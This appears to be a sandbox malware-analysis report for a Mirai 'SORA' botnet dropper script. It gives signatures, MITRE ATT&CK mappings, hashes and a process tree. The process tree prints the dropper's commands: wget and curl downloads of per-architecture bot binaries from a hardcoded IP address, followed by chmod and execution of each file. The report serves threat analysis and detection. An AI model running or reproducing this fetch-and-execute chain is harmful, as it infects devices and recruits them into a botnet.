mirai | 84a491a07a6326d56905d54d5fbf23bba9fda2c557a49c8c03d27997a575bb45

Analysis

max time kernel
14s
max time network
16s
platform
debian-9_armhf
resource
debian9-armhf-20240418-en
resource tags

arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11-11-2024 06:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sora.sh
Size

2KB
MD5

eacc4e4ee6c7a6a68e39dd973139585c
SHA1

c5e6d40ed833dbb5ce5985d30b1d73aa122836ad
SHA256

84a491a07a6326d56905d54d5fbf23bba9fda2c557a49c8c03d27997a575bb45
SHA512

33615c52c1cb2c71fc4e0308f6cf69d19e9ac4a3902305985606f2843b75c0bd31dad9e89ddb23103a42c1d46aa99983a84ea53cd074e5ef614b9a5c11b5589d

Score

10^/10

mirai sora antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

SORA

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 14 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
680	chmod
711	chmod
744	chmod
793	chmod
731	chmod
780	chmod
800	chmod
806	chmod
811	chmod
750	chmod
669	chmod
698	chmod
767	chmod
817	chmod

Executes dropped EXE 14 IoCs

ioc	pid	Process
/tmp/robben	670	robben
/tmp/robben	681	robben
/tmp/robben	699	robben
/tmp/robben	712	robben
/tmp/robben	732	robben
/tmp/robben	745	robben
/tmp/robben	751	robben
/tmp/robben	768	robben
/tmp/robben	781	robben
/tmp/robben	794	robben
/tmp/robben	801	robben
/tmp/robben	807	robben
/tmp/robben	812	robben
/tmp/robben	818	robben

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-1.dat	upx
behavioral2/files/fstream-2.dat	upx
behavioral2/files/fstream-3.dat	upx
behavioral2/files/fstream-5.dat	upx

Checks CPU configuration 1 TTPs 14 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
672	wget
674	curl
678	cat

Writes file to tmp directory 24 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.arm4	curl
File opened for modification	/tmp/sora.x86	curl
File opened for modification	/tmp/sora.mips	curl
File opened for modification	/tmp/sora.mpsl	curl
File opened for modification	/tmp/sora.arm5	wget
File opened for modification	/tmp/sora.arm5	curl
File opened for modification	/tmp/sora.arm6	curl
File opened for modification	/tmp/sora.ppc	wget
File opened for modification	/tmp/sora.ppc440fp	curl
File opened for modification	/tmp/robben	sora.sh
File opened for modification	/tmp/sora.mips	wget
File opened for modification	/tmp/sora.x86_64	wget
File opened for modification	/tmp/sora.m68k	curl
File opened for modification	/tmp/sora.i686	wget
File opened for modification	/tmp/sora.i686	curl
File opened for modification	/tmp/sora.mpsl	wget
File opened for modification	/tmp/sora.sh4	wget
File opened for modification	/tmp/sora.x86	wget
File opened for modification	/tmp/sora.x86_64	curl
File opened for modification	/tmp/sora.i468	curl
File opened for modification	/tmp/sora.sh4	curl
File opened for modification	/tmp/sora.arm7	curl
File opened for modification	/tmp/sora.ppc	curl
File opened for modification	/tmp/sora.m68k	wget

/tmp/sora.sh
/tmp/sora.sh
1⤵
- Writes file to tmp directory
PID:638
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.x86
  2⤵
  - Writes file to tmp directory
  PID:640
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:658
- /bin/cat
  cat sora.x86
  2⤵
  PID:667
- /bin/chmod
  chmod +x robben sora.sh sora.x86 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:669
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:670
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:672
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:674
- /bin/cat
  cat sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:678
- /bin/chmod
  chmod +x robben sora.mips sora.sh sora.x86 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:680
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:681
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.x86_64
  2⤵
  - Writes file to tmp directory
  PID:683
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.x86_64
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:690
- /bin/cat
  cat sora.x86_64
  2⤵
  PID:696
- /bin/chmod
  chmod +x robben sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:698
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:699
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.i468
  2⤵
  PID:701
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.i468
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:705
- /bin/cat
  cat sora.i468
  2⤵
  PID:709
- /bin/chmod
  chmod +x robben sora.i468 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:711
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:712
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.i686
  2⤵
  - Writes file to tmp directory
  PID:714
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:719
- /bin/cat
  cat sora.i686
  2⤵
  PID:730
- /bin/chmod
  chmod +x robben sora.i468 sora.i686 sora.mips sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:731
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:732
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.mpsl
  2⤵
  - Writes file to tmp directory
  PID:735
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat sora.mpsl
  2⤵
  PID:743
- /bin/chmod
  chmod +x robben sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.arm4
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.arm4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:748
- /bin/cat
  cat sora.arm4
  2⤵
  PID:749
- /bin/chmod
  chmod +x robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:751
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.arm5
  2⤵
  - Writes file to tmp directory
  PID:753
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:758
- /bin/cat
  cat sora.arm5
  2⤵
  PID:765
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:767
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:768
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.arm6
  2⤵
  PID:769
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/cat
  cat sora.arm6
  2⤵
  PID:778
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:780
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:781
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.arm7
  2⤵
  PID:782
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:786
- /bin/cat
  cat sora.arm7
  2⤵
  PID:791
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:794
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.ppc
  2⤵
  - Writes file to tmp directory
  PID:796
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:798
- /bin/cat
  cat sora.ppc
  2⤵
  PID:799
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:801
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.ppc440fp
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.ppc440fp
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat sora.ppc440fp
  2⤵
  PID:805
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:807
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.m68k
  2⤵
  - Writes file to tmp directory
  PID:808
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/cat
  cat sora.m68k
  2⤵
  PID:810
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:811
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:812
- /usr/bin/wget
  wget http://185.78.76.132/bins/sora.sh4
  2⤵
  - Writes file to tmp directory
  PID:814
- /usr/bin/curl
  curl -O http://185.78.76.132/bins/sora.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:815
- /bin/cat
  cat sora.sh4
  2⤵
  PID:816
- /bin/chmod
  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.i468 sora.i686 sora.m68k sora.mips sora.mpsl sora.ppc sora.ppc440fp sora.sh sora.sh4 sora.x86 sora.x86_64 systemd-private-4c0dc64381f345a6866daebbad7480d6-systemd-timedated.service-ALaaMz
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/robben
  ./robben Payload
  2⤵
  - Executes dropped EXE
  PID:818

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/robben

Filesize
160KB

MD5
8fa1e5ec846c8de3cc5061e30c903477

SHA1
65f30cd9f5799c7bfa9ca36094b9117609ff1a98

SHA256
04851d0df7d295f27e0ff96dbd6ca9ed239ea69ad7c8a2b1159df31d687198e7

SHA512
9d9214d98dfe557cf62f70dd1d5d94631584110fd2e0e3e733be40d4e56423e47b1d8cb4281547a088aec489c8c30d5c6c0ee8b074f1e6c403a5cb43f7c1e084

Download Submit
/tmp/robben

Filesize
176KB

MD5
036644b8ef628fa62226eb1fc01feceb

SHA1
79402951ae1d4d1bff08301f78977e9bba76e903

SHA256
bcedb6652f8a2f802d09e40398e49917825681a65d787bf1bce4883ff6df99be

SHA512
0a12cbb78b6262595627baa32513297efd67a74fbf49522060ed9d878cb5f06d46b2008a08cb3c622ef910f735426b5a3350cae901a8be1ad8783b54cff7b850

Download Submit
/tmp/robben

Filesize
174KB

MD5
9339280df3125c56649c9a2db7d4f218

SHA1
466b762e861fd5a18f79952d7e3b79beee229c27

SHA256
fe2ed9124cf1a0b57c1b22bfea344af4a33f48d3262cd14865a9e3c7522103f4

SHA512
dc163ff166e4bcfdad626dd426d167c53cc9bc0db29f20b39aafed9a429a0de87efcf3fab8273fd440194735b6c6a29e47709e2a58fb78c3b3e8806662c3a8db

Download Submit
/tmp/robben

Filesize
275B

MD5
4bf6c98c8352ff48ab4530a09c49b9d1

SHA1
27de6f90ee319bea4c0e352c15c6e400ae49a17b

SHA256
b5c946bae3a6f8f56d55227ed1211422ad6a0f6faf39cd2d333c703aeb509049

SHA512
050c4cbcae15a7818a3506ecb761fc7302f30dcbecbcd05fd8d1f7352787a6dc71e2c0002bfc188d346e81a49d5d6009721ee1c438c87f37cdca0736a7a60288

Download Submit
/tmp/robben

Filesize
162KB

MD5
6c7713a17cde78068cd75aec2f46a2d4

SHA1
4970f13deafe4225361eff1ae688267a15c1298b

SHA256
aaa1e31b0499ead6831a9f3ad7e84ad801416d1b435add36394e95630a569082

SHA512
5bba17fbe474317af340d12eb7476ae772b9baeb796fa13bdb8b903966be5924453bfa0ae2f6dd9a9e7a33e828032d6a5232d1b97d43b82a258d3092157cb322

Download Submit
/tmp/robben

Filesize
634KB

MD5
3eb421a8a21c26521072a0ca327d3468

SHA1
084bd97e4bcf33f9167b24e76fa91fa40a649339

SHA256
70d582eb86f108f17bf91dd355efa2fae0aa84c063d872cd34740c2c0ff3cd18

SHA512
3c6c791798697be84c2879f379e9ef5fd785ae48fb97ff719e675f5336dc735c61db6fad76cc81c97f8e1a1ab5915010746e34002604472368d3a61c10ed30b4

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads